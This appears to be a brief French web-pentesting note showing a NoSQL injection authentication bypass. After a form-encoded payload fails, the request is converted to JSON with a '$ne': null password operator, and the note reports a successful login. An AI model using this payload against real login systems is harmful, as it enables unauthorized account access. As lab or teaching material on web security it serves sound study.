NoSQL Injection (Content-Type Modification) - Web Pentesting

Vulnérabilité NoSQL Injection (Bypass d'authentification)

Interception de la requête avec Burp Suite.

Test des injections classiques :

username=admin&password[$ne]=toto

Cela ne fonctionne pas.

Conversion en JSON et modification du Content-Type en application/json :

{
  "user": "admin",
  "password": { "$ne": null }
}

Résultat : Authentification réussie !

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?